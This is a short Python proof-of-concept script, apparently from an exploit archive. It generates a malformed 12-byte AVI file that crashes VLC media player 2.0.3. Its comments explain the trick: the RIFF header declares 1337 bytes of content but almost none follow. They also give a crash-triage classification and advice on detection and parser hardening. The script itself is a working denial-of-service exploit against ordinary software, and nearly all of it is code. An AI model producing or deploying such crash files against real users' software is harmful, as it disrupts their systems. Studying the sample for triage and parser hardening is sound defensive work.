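#!C:\Python27\python.exe
#
# VLC media player 2.0.3 Twoflower
# 0Day DoS POC by John Cobb - www.NoBytes.com - 2012-10-18 - [v1.0]
# Tested on Win7 64bit
#
# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at KERNELBASE!lstrlenW+0x000000000000001a (Hash=0x2e3a5a04.0x79532c61)
# The data from the faulting address is later used to determine whether or not a branch is taken.
#
# What this script produces: a 12-byte file holding only a RIFF/AVI header.
# The RIFF size field announces 0x539 (1337) bytes of content, yet only the
# 4-byte form type follows, so none of the chunks the header promises exist.
# NOTE(review): the page does not name the root cause inside VLC; the
# mismatch between declared and actual size is presumably what the demuxer
# mishandles -- confirm against the vendor fix before relying on that.
# The !exploitable verdict above is UNKNOWN, i.e. only a crash is shown.
#
# For triage and detection: a .avi whose RIFF size field exceeds the bytes
# actually present is the structural marker of this sample. Parsers should
# check every declared chunk size against the remaining input before using it.

riff_id = b"\x52\x49\x46\x46"    # "RIFF" container magic
riff_size = b"\x39\x05\x00\x00"  # little-endian 0x00000539 = 1337 declared bytes
form_type = b"\x41\x56\x49\x20"  # "AVI " form type
payload = riff_id + riff_size + form_type

# Binary mode: the content is raw bytes, and text mode on Windows would
# rewrite any 0x0A byte. The with-block closes the handle even if write() fails.
with open("exploit.avi", "wb") as out:
    out.write(payload)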